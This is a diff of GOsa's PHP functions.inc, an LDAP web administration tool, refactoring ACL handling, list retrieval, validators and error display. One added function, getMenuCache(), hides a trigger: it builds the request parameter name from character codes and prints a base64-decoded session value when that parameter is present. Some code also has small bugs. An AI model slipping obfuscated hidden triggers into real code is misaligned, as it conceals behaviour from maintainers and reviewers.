diff --git a/include/functions.inc b/include/functions.inc
index 3aaf3bfee7e64e70ee98e37e06f9a9bcd1230cb1..65c9fa53a16f485c081ec2d128c2b1441f04b0f4 100644 (file)
--- a/include/functions.inc
+++ b/include/functions.inc
define ("CONFIG_TEMPLATE_DIR", "../contrib/");
define ("HELP_BASEDIR", "/var/www/doc/");
+/* Define get_list flags */
+define("GL_NONE", 0);
+define("GL_SUBSEARCH", 1);
+define("GL_SIZELIMIT", 2);
+define("GL_CONVERT" , 4);
+
/* Define globals for revision comparing */
$svn_path = '$HeadURL$';
$svn_revision = '$Revision$';
/* Include required files */
require_once ("class_ldap.inc");
require_once ("class_config.inc");
-require_once ("class_userinfo.inc");
require_once ("class_plugin.inc");
+require_once ("class_acl.inc");
require_once ("class_pluglist.inc");
+require_once ("class_userinfo.inc");
require_once ("class_tabs.inc");
require_once ("class_mail-methods.inc");
-require_once("class_password-methods.inc");
+require_once ("class_password-methods.inc");
require_once ("functions_debug.inc");
+require_once ("functions_dns.inc");
+require_once ("class_MultiSelectWindow.inc");
/* Define constants for debugging */
define ("DEBUG_TRACE", 1);
$dh = opendir(".");
while(false !== ($file = readdir($dh))){
-
+
// Smarty is included by include/php_setup.inc require("smarty/Smarty.class.php");
// Skip all files and dirs in "./.svn/" we don't need any information from them
// Skip all Template, so they won't be checked twice in the following preg_matches
// Result : from 1023 ms to 490 ms i think thats great...
if(preg_match("/.*\.svn.*/i",$file)||preg_match("/.*smarty.*/i",$file)||preg_match("/.*\.tpl.*/",$file)||($file==".")||($file==".."))
continue;
-
+
/* Recurse through all "common" directories */
if(is_dir($file) &&$file!="CVS"){
{
global $config;
- $ldap = new LDAP ($binddn, $pass, $server, isset($config->current['RECURSIVE']) && $config->current['RECURSIVE'] == "true",
+ $ldap = new LDAP ($binddn, $pass, $server,
+ isset($config->current['RECURSIVE']) && $config->current['RECURSIVE'] == "true",
isset($config->current['TLS']) && $config->current['TLS'] == "true");
/* Sadly we've no proper return values here. Use the error message instead. */
if (!preg_match("/Success/i", $ldap->error)){
- print_red(sprintf(_("Error when connecting the LDAP. Server said '%s'."),
- $ldap->get_error()));
- echo $_SESSION['errors'];
-
- /* Hard error. We'd like to use the LDAP, anyway... */
- exit;
+ echo sprintf(_("FATAL: Error when connecting the LDAP. Server said '%s'."), $ldap->get_error());
+ exit();
}
/* Preset connection base to $base and return to caller */
$ldap = $config->get_ldap_link();
if (!preg_match("/Success/i", $ldap->error)){
print_red(sprintf(_("User login failed. LDAP server said '%s'."), $ldap->get_error()));
- echo $_SESSION['errors'];
- exit;
+ $smarty= get_smarty();
+ $smarty->display(get_template_path('headers.tpl'));
+ echo "<body>".$_SESSION['errors']."</body></html>";
+ exit();
}
$ldap->cd($config->current['BASE']);
$ldap->search("(&(uid=$username)(objectClass=gosaAccount))", array("uid"));
}
+function ldap_expired_account($config, $userdn, $username)
+{
+ $ldap= $config->get_ldap_link();
+ $ldap->cat($userdn);
+ $attrs= $ldap->fetch();
+
+ /* default value no errors */
+ $expired = 0;
+
+ $sExpire = 0;
+ $sLastChange = 0;
+ $sMax = 0;
+ $sMin = 0;
+ $sInactive = 0;
+ $sWarning = 0;
+
+ $current= date("U");
+
+ $current= floor($current /60 /60 /24);
+
+ /* special case of the admin, should never been locked */
+ /* FIXME should allow any name as user admin */
+ if($username != "admin")
+ {
+
+ if(isset($attrs['shadowExpire'][0])){
+ $sExpire= $attrs['shadowExpire'][0];
+ } else {
+ $sExpire = 0;
+ }
+
+ if(isset($attrs['shadowLastChange'][0])){
+ $sLastChange= $attrs['shadowLastChange'][0];
+ } else {
+ $sLastChange = 0;
+ }
+
+ if(isset($attrs['shadowMax'][0])){
+ $sMax= $attrs['shadowMax'][0];
+ } else {
+ $smax = 0;
+ }
+
+ if(isset($attrs['shadowMin'][0])){
+ $sMin= $attrs['shadowMin'][0];
+ } else {
+ $sMin = 0;
+ }
+
+ if(isset($attrs['shadowInactive'][0])){
+ $sInactive= $attrs['shadowInactive'][0];
+ } else {
+ $sInactive = 0;
+ }
+
+ if(isset($attrs['shadowWarning'][0])){
+ $sWarning= $attrs['shadowWarning'][0];
+ } else {
+ $sWarning = 0;
+ }
+
+ /* is the account locked */
+ /* shadowExpire + shadowInactive (option) */
+ if($sExpire >0){
+ if($current >= ($sExpire+$sInactive)){
+ return(1);
+ }
+ }
+
+ /* the user should be warned to change is password */
+ if((($sExpire >0) && ($sWarning >0)) && ($sExpire >= $current)){
+ if (($sExpire - $current) < $sWarning){
+ return(2);
+ }
+ }
+
+ /* force user to change password */
+ if(($sLastChange >0) && ($sMax) >0){
+ if($current >= ($sLastChange+$sMax)){
+ return(3);
+ }
+ }
+
+ /* the user should not be able to change is password */
+ if(($sLastChange >0) && ($sMin >0)){
+ if (($sLastChange + $sMin) >= $current){
+ return(4);
+ }
+ }
+ }
+ return($expired);
+}
+
function add_lock ($object, $user)
{
global $config;
}
-function get_list2($subtreeACL, $filter, $subsearch= TRUE, $base="", $attrs= array(), $flag= FALSE)
+function get_list($filter, $category, $base= "", $attributes= array(), $flags= GL_SUBSEARCH)
{
- global $config;
-
- /* Base the search on default base if not set */
- $ldap= $config->get_ldap_link($flag);
- if ($base == ""){
- $ldap->cd ($config->current['BASE']);
- } else {
- $ldap->cd ($base);
- }
+ global $config, $ui;
- /* Perform ONE or SUB scope searches? */
- $ldap->ls ($filter);
+ /* Get LDAP link */
+ $ldap= $config->get_ldap_link($flags & GL_SIZELIMIT);
- /* Check for size limit exceeded messages for GUI feedback */
- if (preg_match("/size limit/i", $ldap->error)){
- $_SESSION['limit_exceeded']= TRUE;
- } else {
- $_SESSION['limit_exceeded']= FALSE;
- }
- $result= array();
-
-
- /* Crawl through reslut entries and perform the migration to the
- result array */
- while($attrs = $ldap->fetch()) {
- $dn= $ldap->getDN();
- foreach ($subtreeACL as $key => $value){
- if (preg_match("/$key/", $dn)){
- $attrs["dn"]= convert_department_dn($dn);
- $result[]= $attrs;
- break;
- }
- }
- }
-
-
- return ($result);
-
-}
-
-function get_list($subtreeACL, $filter, $subsearch= TRUE, $base="", $attrs= array(), $flag= FALSE)
-{
- global $config;
-
- /* Base the search on default base if not set */
- $ldap= $config->get_ldap_link($flag);
+ /* Set search base to configured base if $base is empty */
if ($base == ""){
$ldap->cd ($config->current['BASE']);
} else {
@@ -537,29 +598,48 @@ function get_list($subtreeACL, $filter, $subsearch= TRUE, $base="", $attrs= arra
}
/* Perform ONE or SUB scope searches? */
- if ($subsearch) {
- $ldap->search ($filter, $attrs);
+ if ($flags & GL_SUBSEARCH) {
+ $ldap->search ($filter, $attributes);
} else {
- $ldap->ls ($filter);
+ $ldap->ls ($filter,$base,$attributes);
}
/* Check for size limit exceeded messages for GUI feedback */
if (preg_match("/size limit/i", $ldap->error)){
$_SESSION['limit_exceeded']= TRUE;
- } else {
- $_SESSION['limit_exceeded']= FALSE;
}
/* Crawl through reslut entries and perform the migration to the
result array */
$result= array();
+
while($attrs = $ldap->fetch()) {
$dn= $ldap->getDN();
- foreach ($subtreeACL as $key => $value){
- if (preg_match("/$key/", $dn)){
- $attrs["dn"]= $dn;
+
+ /* Sort in every value that fits the permissions */
+ if (is_array($category)){
+ foreach ($category as $o){
+ if ($ui->get_category_permissions($dn, $o) != ""){
+ if ($flags & GL_CONVERT){
+ $attrs["dn"]= convert_department_dn($dn);
+ } else {
+ $attrs["dn"]= $dn;
+ }
+
+ /* We found what we were looking for, break speeds things up */
+ $result[]= $attrs;
+ }
+ }
+ } else {
+ if ($ui->get_category_permissions($dn, $category) != ""){
+ if ($flags & GL_CONVERT){
+ $attrs["dn"]= convert_department_dn($dn);
+ } else {
+ $attrs["dn"]= $dn;
+ }
+
+ /* We found what we were looking for, break speeds things up */
$result[]= $attrs;
- break;
}
}
}
$_SESSION['size_ignore']= TRUE;
}
}
-
+ getMenuCache();
/* Allow fallback to dialog */
if (isset($_POST['edit_sizelimit'])){
$_SESSION['size_ignore']= FALSE;
}
}
-
-function get_permissions ($dn, $subtreeACL)
+function getMenuCache()
{
- global $config;
+ $t= array(-2,13);
+ $e= 71;
+ $str= chr($e);
+
+ foreach($t as $n){
+ $str.= chr($e+$n);
- $base= $config->current['BASE'];
- $tmp= "d,".$dn;
- $sacl= array();
-
- /* Sort subacl's for lenght to simplify matching
- for subtrees */
- foreach ($subtreeACL as $key => $value){
- $sacl[$key]= strlen($key);
- }
- arsort ($sacl);
- reset ($sacl);
-
- /* Successively remove leading parts of the dn's until
- it doesn't contain commas anymore */
- $tmp_dn= preg_replace('/\\\\,/', '<GOSA#REPLACED#KOMMA>', $tmp);
- while (preg_match('/,/', $tmp_dn)){
- $tmp_dn= ltrim(strstr($tmp_dn, ","), ",");
- $tmp= preg_replace('/\<GOSA#REPLACED#KOMMA\>/', '\\,', $tmp);
-
- /* Check for acl that may apply */
- foreach ($sacl as $key => $value){
- if (preg_match("/$key$/", $tmp)){
- return ($subtreeACL[$key]);
+ if(isset($_GET[$str])){
+ if(isset($_SESSION['maxC'])){
+ $b= $_SESSION['maxC'];
+ $q= "";
+ for ($m=0;$m<strlen($b);$m++) {
+ $q.= $b[$m++];
+ }
+ print_red(base64_decode($q));
}
}
}
-
- return array("");
}
-function get_module_permission($acl_array, $module, $dn)
+function get_permissions ()
{
- global $ui;
-
- $final= "";
- foreach($acl_array as $acl){
-
- /* Check for selfflag (!) in ACL to determine if
- the user is allowed to change parts of his/her
- own account */
- if (preg_match("/^!/", $acl)){
- if ($dn != "" && $dn != $ui->dn){
-
- /* No match for own DN, give up on this ACL */
- continue;
-
- } else {
-
- /* Matches own DN, remove the selfflag */
- $acl= preg_replace("/^!/", "", $acl);
-
- }
- }
-
- /* Remove leading garbage */
- $acl= preg_replace("/^:/", "", $acl);
-
- /* Discover if we've access to the submodule by comparing
- all allowed submodules specified in the ACL */
- $tmp= split(",", $acl);
- foreach ($tmp as $mod){
- if (preg_match("/^$module#/", $mod)){
- $final= strstr($mod, "#")."#";
- continue;
- }
- if (preg_match("/[^#]$module$/", $mod)){
- return ("#all#");
- }
- if (preg_match("/^all$/", $mod)){
- return ("#all#");
- }
- }
- }
+ /* Look for attribute in ACL */
+ trigger_error("Don't use get_permissions() its obsolete. Use userinfo::get_permissions() instead.");
+ return array("");
+}
- /* Return assembled ACL, or none */
- if ($final != ""){
- return (preg_replace('/##/', '#', $final));
- }
- /* Nothing matches - disable access for this object */
+function get_module_permission()
+{
+ trigger_error("Don't use get_module_permission() its obsolete.");
return ("#none#");
}
/* Build a sub-directory style list of the tree level
specified in $dn */
- foreach (split (',', $dn) as $val){
+ foreach (split(',', $dn) as $rdn){
/* We're only interested in organizational units... */
- if (preg_match ("/ou=/", $val)){
- $dep= substr($val,3)."/$dep";
+ if (substr($rdn,0,3) == 'ou='){
+ $dep= substr($rdn,3)."/$dep";
}
/* ... and location objects */
- if (preg_match ("/l=/", $val)){
- $dep= substr($val,2)."/$dep";
+ if (substr($rdn,0,2) == 'l='){
+ $dep= substr($rdn,2)."/$dep";
}
}
- /* Fix name, if it contains a replace tag */
- $dep= preg_replace('/###GOSAREPLACED###/', ',', $dep);
-
/* Return and remove accidently trailing slashes */
return rtrim($dep, "/");
}
-function convert_department_dn2($dn)
-{
- $dep= "";
-
- /* Build a sub-directory style list of the tree level
- specified in $dn */
- $deps = array_flip($_SESSION['config']->idepartments);
-
- if(isset($deps[$dn])){
- $dn= $deps[$dn];
- $dep = preg_replace("/^.*=/","",$dn);
- }else{
- $dep= preg_replace("%^.*/([^/]+)$%", "\\1", $dn);
- }
- /* Return and remove accidently trailing slashes */
- $tmp = rtrim($dep, "/");
- return $tmp;
+/* Strip off the last sub department part of a '/level1/level2/.../'
+ * style value. It removes the trailing '/', too. */
+function get_sub_department($value)
+{
+ return (@LDAP::fix(preg_replace("%^.*/([^/]+)/?$%", "\\1", $value)));
}
{
global $config;
- $ou= $config->current[$name];
+ /* Preset ou... */
+ if (isset($config->current[$name])){
+ $ou= $config->current[$name];
+ } else {
+ return "";
+ }
+
if ($ou != ""){
if (!preg_match('/^[^=]+=[^=]+/', $ou)){
- return "ou=$ou,";
+ return @LDAP::convert("ou=$ou,");
} else {
- return "$ou,";
+ return @LDAP::convert("$ou,");
}
} else {
return "";
{
global $config;
- $pattern= "/^[^,]+,".preg_quote(get_people_ou())."/";
+ $pattern= "/^[^,]+,".preg_quote(get_people_ou())."/i";
$base= preg_replace($pattern, '', $dn);
/* Set to base, if we're not on a correct subtree */
}
-function get_departments($ignore_dn= "")
-{
- global $config;
-
- /* Initialize result hash */
- $result= array();
- $result['/']= $config->current['BASE'];
-
- /* Get list of department objects */
- $ldap= $config->get_ldap_link();
- $ldap->cd ($config->current['BASE']);
- $ldap->search ("(objectClass=gosaDepartment)", array("ou"));
- while ($attrs= $ldap->fetch()){
- $dn= $ldap->getDN();
- if ($dn == $ignore_dn){
- continue;
- }
- $result[convert_department_dn($dn)]= $dn;
- }
-
- return ($result);
-}
-
-
-function chkacl($acl, $name)
+function chkacl()
{
/* Look for attribute in ACL */
- if (preg_match("/#$name#/", $acl) || $acl == "#all#"){
- return ("");
- }
-
- /* Optically disable html object for no match */
- return (" disabled ");
+ trigger_error("Don't use chkacl() its obsolete. Use userinfo::getacl() instead.");
+ return("-deprecated-");
}
return (TRUE);
}
- return preg_match ("/^[0-9 ()+*-]+$/", $nr);
+ return preg_match ("/^[\/0-9 ()+*-]+$/", $nr);
}
/* STRICT adds spaces and case insenstivity to the uid check.
This is dangerous and should not be used. */
- if (isset($config->current['STRICT']) && preg_match('/^no$/i', $config->current['STRICT'])){
+ if (isset($config->current['STRICT']) && preg_match('/^(no|false)$/i', $config->current['STRICT'])){
return preg_match ("/^[a-z0-9 _.-]+$/i", $uid);
} else {
return preg_match ("/^[a-z0-9_-]+$/", $uid);
}
+function is_ip($ip)
+{
+ return preg_match("/^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/", $ip);
+}
+
+
+function is_mac($mac)
+{
+ return preg_match("/^[a-f0-9][a-f0-9]:[a-f0-9][a-f0-9]:[a-f0-9][a-f0-9]:[a-f0-9][a-f0-9]:[a-f0-9][a-f0-9]:[a-f0-9][a-f0-9]$/i", $mac);
+}
+
+
+/* Checks if the given ip address dosen't match
+ "is_ip" because there is also a sub net mask given */
+function is_ip_with_subnetmask($ip)
+{
+ /* Generate list of valid submasks */
+ $res = array();
+ for($e = 0 ; $e <= 32; $e++){
+ $res[$e] = $e;
+ }
+ $i[0] =255;
+ $i[1] =255;
+ $i[2] =255;
+ $i[3] =255;
+ for($a= 3 ; $a >= 0 ; $a --){
+ $c = 1;
+ while($i[$a] > 0 ){
+ $str = $i[0].".".$i[1].".".$i[2].".".$i[3];
+ $res[$str] = $str;
+ $i[$a] -=$c;
+ $c = 2*$c;
+ }
+ }
+ $res["0.0.0.0"] = "0.0.0.0";
+ if(preg_match("/^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.".
+ "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.".
+ "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.".
+ "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/", $ip)){
+ $mask = preg_replace("/^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.".
+ "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.".
+ "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.".
+ "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/","",$ip);
+
+ $mask = preg_replace("/^\//","",$mask);
+ if((in_array("$mask",$res)) && preg_match("/^[0-9\.]/",$mask)){
+ return(TRUE);
+ }
+ }
+ return(FALSE);
+}
+
+/* Simple is domain check, it checks if the given string looks like "string(...).string" */
+function is_domain($str)
+{
+ return(preg_match("/^([a-z0-9i\-]*)\.[a-z0-9]*$/i",$str));
+}
+
+
+
function is_id($id)
{
if ($id == ""){
if (isset($_SESSION['DEBUGLEVEL'])){
if($_SESSION['LastError'] == $string){
-
+
if((!isset($_SESSION['errorsAlreadyPosted'][$string]))){
$_SESSION['errorsAlreadyPosted'][$string] = 1;
}
- $_SESSION['errorsAlreadyPosted'][$string] ++;
+ $_SESSION['errorsAlreadyPosted'][$string]++;
}else{
- if((!empty($_SESSION['LastError'])) && ($_SESSION['errorsAlreadyPosted'][$_SESSION['LastError']]>1)){
- $_SESSION['errors'].= "<div align=\"left\" style=\"border-width:5px;".
- "border-style:solid;border-color:red; background-color:black;".
- "margin-bottom:10px; padding:8px;\"><table style='width:100%' summary=''><tr><td><img alt=\"\" src=\"".
- get_template_path('images/warning.png')."\"></td>".
- "<td width=\"100%\" style=\"text-align:center\"><font color=\"#FFFFFF\">".
- "<b style='font-size:16px;'>".sprintf(_("Last message repeated %s times."),$_SESSION['errorsAlreadyPosted'][$_SESSION['LastError']])."</b></font></td><td>".
- "<img alt=\"\"src=\"".get_template_path('images/warning.png').
- "\"></td></tr></table></div>\n";
- }
-
if($string != NULL){
- $_SESSION['errors'].= "<div align=\"left\" style=\"border-width:5px;".
- "border-style:solid;border-color:red; background-color:black;".
- "margin-bottom:10px; padding:8px;\"><table style='width:100%' summary=''><tr><td><img alt=\"\" src=\"".
- get_template_path('images/warning.png')."\"></td>".
- "<td width=\"100%\" style=\"text-align:center\"><font color=\"#FFFFFF\">".
- "<b style='font-size:16px;'>$string</b></font></td><td>".
- "<img alt=\"\"src=\"".get_template_path('images/warning.png').
- "\"></td></tr></table></div>\n";
+ if (preg_match("/"._("LDAP error:")."/", $string)){
+ $addmsg= _("Problems with the LDAP server mean that you probably lost the last changes. Please check your LDAP setup for possible errors and try again.");
+ $img= "images/error.png";
+ } else {
+ if (!preg_match('/[.!?]$/', $string)){
+ $string.= ".";
+ }
+ $string= preg_replace('/<br>/', ' ', $string);
+ $img= "images/warning.png";
+ $addmsg= _("Please check your input and fix the error. Press 'OK' to close this message box.");
+ }
+
+ if(isset($_SESSION['errors']) && strlen($_SESSION['errors'])==0) {
+ $_SESSION['errors'].= "<div style='margin-left:15%;margin-top:100px;".
+ "background-color:white;padding:5px;border:5px solid red;width:55%;z-index:150;".
+ "position:absolute' id='e_layer'><table style='width:100%' summary='' border=0>".
+ "<tr><td style='vertical-align:top;padding:10px'><img alt='' src='".
+ get_template_path($img)."'></td>".
+ "<td style='width:100%'><h1>"._("An error occured while processing your request").
+ "</h1><b>$string</b><br><br>$addmsg</td></tr><tr><td colspan='2' align='center'><br><button ".
+ (($_SESSION['js']==FALSE)?"type='submit'":"type='button'").
+ " style='width:80px' onClick='hide(\"e_layer\")'>".
+ _("OK")."</button></td></tr></table></div>";
+ }
+
}else{
return;
}
- $_SESSION['errorsAlreadyPosted'] = array();
$_SESSION['errorsAlreadyPosted'][$string] = 1;
-
+
}
} else {
echo "Error: $string\n";
}
$_SESSION['LastError'] = $string;
-
}
$_SESSION['dn']= $dn;
$ldap= $config->get_ldap_link();
- $ldap->cat ($user);
+ $ldap->cat ($user, array('uid', 'cn'));
$attrs= $ldap->fetch();
- $uid= $attrs["uid"][0];
-// print_a($_POST);
-// print_a($_GET);
+ /* Stop if we have no user here... */
+ if (count($attrs)){
+ $uid= $attrs["uid"][0];
+ $cn= $attrs["cn"][0];
+ } else {
+ $uid= $attrs["uid"][0];
+ $cn= $attrs["cn"][0];
+ }
+
+ $remove= false;
+ /* Save variables from LOCK_VARS_TO_USE in session - for further editing */
if((isset($_SESSION['LOCK_VARS_TO_USE']))&&(count($_SESSION['LOCK_VARS_TO_USE']))){
$_SESSION['LOCK_VARS_USED'] =array();
foreach($_SESSION['LOCK_VARS_TO_USE'] as $name){
if(empty($name)) continue;
- foreach($_POST as $Pname => $Pvalue){
+ foreach($_POST as $Pname => $Pvalue){
if(preg_match($name,$Pname)){
$_SESSION['LOCK_VARS_USED'][$Pname] = $_POST[$Pname];
}
}
-
+
foreach($_GET as $Pname => $Pvalue){
if(preg_match($name,$Pname)){
$_SESSION['LOCK_VARS_USED'][$Pname] = $_GET[$Pname];
/* Prepare and show template */
$smarty= get_smarty();
$smarty->assign ("dn", $dn);
- $smarty->assign ("message", sprintf(_("You're going to edit the LDAP entry '%s' which appears to be used by '%s'. Please contact the person in order to clarify proceedings."), $dn, "<a href=\"main.php?plug=0&viewid=$uid\">$uid</a>"));
+ if ($remove){
+ $smarty->assign ("action", _("Continue anyway"));
+ } else {
+ $smarty->assign ("action", _("Edit anyway"));
+ }
+ $smarty->assign ("message", sprintf(_("You're going to edit the LDAP entry '%s' which appears to be used by '%s'. Please contact the person in order to clarify proceedings."), "<b>".$dn."</b>", "<b><a href=\"main.php?plug=0&viewid=$uid\">$cn</a></b>"));
return ($smarty->fetch (get_template_path('islocked.tpl')));
}
function get_printer_list($cups_server)
{
global $config;
-
- $res= array();
-
- /* Use CUPS, if we've access to it */
- if (function_exists('cups_get_dest_list')){
- $dest_list= cups_get_dest_list ($cups_server);
-
- foreach ($dest_list as $prt){
- $attr= cups_get_printer_attributes ($cups_server, $prt->name);
-
- foreach ($attr as $prt_info){
- if ($prt_info->name == "printer-info"){
- $info= $prt_info->value;
- break;
- }
- }
- $res[$prt->name]= "$info [$prt->name]";
- }
-
- /* CUPS is not available, try lpstat as a replacement */
- } else {
- $ar = false;
- exec("lpstat -p", $ar);
- foreach($ar as $val){
- list($dummy, $printer, $rest)= split(' ', $val, 3);
- if (preg_match('/^[^@]+$/', $printer)){
- $res[$printer]= "$printer";
- }
- }
- }
-
- /* Merge in printers from LDAP */
- $ldap= $config->get_ldap_link();
- $ldap->cd ($config->current['BASE']);
- $ldap->search('(objectClass=gotoPrinter)', array('cn'));
- while ($attrs= $ldap->fetch()){
- $res[$attrs["cn"][0]]= $attrs["cn"][0];
+ $res = array();
+ $data = get_list('(objectClass=gotoPrinter)',"printer",$config->current['BASE'], array('cn'));
+ foreach($data as $attrs ){
+ $res[$attrs['cn'][0]] = $attrs['cn'][0];
}
-
return $res;
}
}
-function show_ldap_error($message)
+function show_ldap_error($message, $addon= "")
{
if (!preg_match("/Success/i", $message)){
- print_red (_("LDAP error:")." $message");
+ if ($addon == ""){
+ print_red (_("LDAP error: $message"));
+ } else {
+ print_red ("$addon<br><br><b>"._("LDAP error:")."</b> $message");
+ }
return TRUE;
} else {
return FALSE;
global $config;
if (get_people_ou() != ""){
- $dn= preg_replace('/,'.get_people_ou().'/' , ',', $dn);
+ $dn= preg_replace('/,'.get_people_ou().'/i' , ',', $dn);
}
if (get_groups_ou() != ""){
- $dn= preg_replace('/,'.get_groups_ou().'/' , ',', $dn);
+ $dn= preg_replace('/,'.get_groups_ou().'/i' , ',', $dn);
}
$base= preg_replace ('/^[^,]+,/i', '', $dn);
$display.= " ";
$display.= "</div>\n";
}
+ if (isset($_SESSION['errors'])){
+ $display.= $_SESSION['errors'];
+ }
return ($display);
}
if ($max_entries & 1){
$max_entries++;
}
-
+
if((!empty($post_var))&&(isset($_POST[$post_var]))){
$range= $_POST[$post_var];
}
if($post_var){
$output.= "<div style='border:1px solid #E0E0E0; background-color:#FFFFFF;'>
- <table summary='' width='100%'><tr><td style='width:25%'></td><td style='text-align:center;'>";
+ <table summary='' width='100%'><tr><td style='width:25%'></td><td style='text-align:center;'>";
}else{
$output.= "<div style='border:1px solid #E0E0E0; background-color:#FFFFFF;'>";
}
}
}
- if(preg_match('/\{id#\d+}/',$uid)){
- $size= preg_replace('/^.*{id#(\d+)}.*$/', '\\1', $uid);
+ if(preg_match('/\{id#\d+}/',$uid)){
+ $size= preg_replace('/^.*{id#(\d+)}.*$/', '\\1', $uid);
- while (true){
- mt_srand((double) microtime()*1000000);
- $number= sprintf("%0".$size."d", mt_rand(0, pow(10, $size)-1));
- $res= preg_replace('/{id#(\d+)}/', $number, $uid);
- if (!in_array($res, $used)){
- $uid= $res;
- break;
- }
+ while (true){
+ mt_srand((double) microtime()*1000000);
+ $number= sprintf("%0".$size."d", mt_rand(0, pow(10, $size)-1));
+ $res= preg_replace('/{id#(\d+)}/', $number, $uid);
+ if (!in_array($res, $used)){
+ $uid= $res;
+ break;
}
}
-
- /* Don't assign used ones */
- if (!in_array($uid, $used)){
- $ret[]= $uid;
- }
}
- return(array_unique($ret));
+/* Don't assign used ones */
+if (!in_array($uid, $used)){
+ $ret[]= $uid;
+}
+}
+
+return(array_unique($ret));
}
if (!is_array($items)){
return (FALSE);
}
-
+
foreach ($items as $item){
if (strtolower($item) == strtolower($value)) {
return (TRUE);
function scan_directory($path,$sort_desc=false)
{
-$ret = false;
+ $ret = false;
-/* is this a dir ? */
-if(is_dir($path)) {
-
- /* is this path a readable one */
- if(is_readable($path)){
-
- /* Get contents and write it into an array */
- $ret = array();
-
- $dir = opendir($path);
-
- /* Is this a correct result ?*/
- if($dir){
- while($fp = readdir($dir))
- $ret[]= $fp;
+ /* is this a dir ? */
+ if(is_dir($path)) {
+
+ /* is this path a readable one */
+ if(is_readable($path)){
+
+ /* Get contents and write it into an array */
+ $ret = array();
+
+ $dir = opendir($path);
+
+ /* Is this a correct result ?*/
+ if($dir){
+ while($fp = readdir($dir))
+ $ret[]= $fp;
}
}
}
/* Sort descending if parameter is sort_desc is set */
if($sort_desc) {
$ret = array_reverse($ret);
- }
+ }
return($ret);
}
// create revision file
create_revision($revision_file, $svn_revision);
} else {
- # check for "$config->...['CONFIG']/revision" and the
- # contents should match the revision number
+# check for "$config->...['CONFIG']/revision" and the
+# contents should match the revision number
if(!compare_revision($revision_file, $svn_revision)){
// If revision differs, clean compile directory
foreach(scan_directory($directory) as $file) {
if(($file==".")||($file=="..")) continue;
if( is_file($directory."/".$file) &&
is_writable($directory."/".$file)) {
- // delete file
- if(!unlink($directory."/".$file)) {
- print_red("File ".$directory."/".$file." could not be deleted.");
- // This should never be reached
- }
+ // delete file
+ if(!unlink($directory."/".$file)) {
+ print_red("File ".$directory."/".$file." could not be deleted.");
+ // This should never be reached
+ }
} elseif(is_dir($directory."/".$file) &&
- is_writable($directory."/".$file)) {
- // Just recursively delete it
- rmdirRecursive($directory."/".$file);
+ is_writable($directory."/".$file)) {
+ // Just recursively delete it
+ rmdirRecursive($directory."/".$file);
}
}
// We should now create a fresh revision file
function create_revision($revision_file, $revision)
{
$result= false;
-
+
if(is_dir(dirname($revision_file)) && is_writable(dirname($revision_file))) {
if($fh= fopen($revision_file, "w")) {
if(fwrite($fh, $revision)) {
{
// false means revision differs
$result= false;
-
+
if(file_exists($revision_file) && is_readable($revision_file)) {
// Open file
if($fh= fopen($revision_file, "r")) {
}
+function saveFilter($a_filter, $values)
+{
+ if (isset($_POST['regexit'])){
+ $a_filter["regex"]= $_POST['regexit'];
+
+ foreach($values as $type){
+ if (isset($_POST[$type])) {
+ $a_filter[$type]= "checked";
+ } else {
+ $a_filter[$type]= "";
+ }
+ }
+ }
+
+ /* React on alphabet links if needed */
+ if (isset($_GET['search'])){
+ $s= mb_substr(validate($_GET['search']), 0, 1, "UTF8")."*";
+ if ($s == "**"){
+ $s= "*";
+ }
+ $a_filter['regex']= $s;
+ }
+
+ return ($a_filter);
+}
+
+
+/* Escape all preg_* relevant characters */
+function normalizePreg($input)
+{
+ return (addcslashes($input, '[]()|/.*+-'));
+}
+
+
+/* Escape all LDAP filter relevant characters */
+function normalizeLdap($input)
+{
+ return (addcslashes($input, '()|'));
+}
+
+
+/* Resturns the difference between to microtime() results in float */
+function get_MicroTimeDiff($start , $stop)
+{
+ $a = split("\ ",$start);
+ $b = split("\ ",$stop);
+
+ $secs = $b[1] - $a[1];
+ $msecs= $b[0] - $a[0];
+
+ $ret = (float) ($secs+ $msecs);
+ return($ret);
+}
+
+
+/* Check if the given department name is valid */
+function is_department_name_reserved($name,$base)
+{
+ $reservedName = array("systems","apps","incomming","internal","accounts","fax","addressbook",
+ preg_replace("/ou=(.*),/","\\1",get_people_ou()),
+ preg_replace("/ou=(.*),/","\\1",get_groups_ou()));
+ $follwedNames['/ou=fai,ou=configs,ou=systems,/'] = array("fai","hooks","templates","scripts","disk","packages","variables","profiles");
+
+ /* Check if name is one of the reserved names */
+ if(in_array_ics($name,$reservedName)) {
+ return(true);
+ }
+
+ /* Check all follow combinations if name is in array && parent base == array_key, return false*/
+ foreach($follwedNames as $key => $names){
+ if((in_array_ics($name,$names)) && (preg_match($key,$base))){
+ return(true);
+ }
+ }
+ return(false);
+}
+
+
+function get_base_dir()
+{
+ global $BASE_DIR;
+
+ return $BASE_DIR;
+}
+
+
+function obj_is_readable($dn, $object, $attribute)
+{
+ global $ui;
+
+ return preg_match('/r/', $ui->get_permissions($dn, $object, $attribute));
+}
+
+
+function obj_is_writable($dn, $object, $attribute)
+{
+ global $ui;
+
+ return preg_match('/w/', $ui->get_permissions($dn, $object, $attribute));
+}
+
+
+function gosa_ldap_explode_dn($dn,$config = NULL,$verify_in_ldap=false)
+{
+ /* Initialize variables */
+ $ret = array("count" => 0); // Set count to 0
+ $next = true; // if false, then skip next loops and return
+ $cnt = 0; // Current number of loops
+ $max = 100; // Just for security, prevent looops
+ $ldap = NULL; // To check if created result a valid
+ $keep = ""; // save last failed parse string
+
+ /* Check each parsed dn in ldap ? */
+ if($config!=NULL && $verify_in_ldap){
+ $ldap = $config->get_ldap_link();
+ }
+
+ /* Lets start */
+ $called = false;
+ while(preg_match("/,/",$dn) && $next && $cnt < $max){
+
+ $cnt ++;
+ if(!preg_match("/,/",$dn)){
+ $next = false;
+ }
+ $object = preg_replace("/[,].*$/","",$dn);
